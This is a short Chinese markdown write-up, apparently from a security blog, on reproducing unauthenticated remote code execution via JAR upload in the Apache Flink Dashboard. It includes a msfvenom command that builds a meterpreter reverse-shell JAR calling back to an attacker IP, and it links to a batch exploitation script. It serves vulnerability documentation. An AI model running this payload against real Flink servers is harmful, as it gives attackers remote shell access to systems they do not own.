menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right Apache Flink Dashboard 未授权访问-远程代码命令执行 chevron_right Apache Flink Dashboard 未授权访问-远程代码命令执行.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    Apache Flink Dashboard 未授权访问-远程代码命令执行.md
    991 B / 2021-07-15 19:47:58
        Apache Flink Dashboard 未授权访问-远程代码命令执行
    ==================================================
    
    一、漏洞简介
    ------------
    
    Apache Flink的任意Jar包上传导致远程代码执行的漏洞
    
    二、漏洞影响
    ------------
    
    \<= 1.9.1(最新版本)
    
    三、复现过程
    ------------
    
    ### 1、
    
        msfvenom -p java/meterpreter/reverse_tcp LHOST=10.10.20.166 LPORT=8989 -f jar > rce.jar
    
    ![](./resource/ApacheFlinkDashboard未授权访问-远程代码命令执行/media/rId25.png)
    
    ### 2、
    
    上传alewong Jar包
    
    ![](./resource/ApacheFlinkDashboard未授权访问-远程代码命令执行/media/rId27.png)
    
    ![](./resource/ApacheFlinkDashboard未授权访问-远程代码命令执行/media/rId28.png)
    
    ### 批量脚本
    
    https://github.com/ianxtianxt/Apache-Flink-Dashboard-rec
    
        Ps:
        当注释掉 if 'Unable to load requested file' in str(data):
        之后,出现Token为空,或者 Unauthorized request 时候是不存在未授权访问的,而是带授权
    
    
    links
    file_download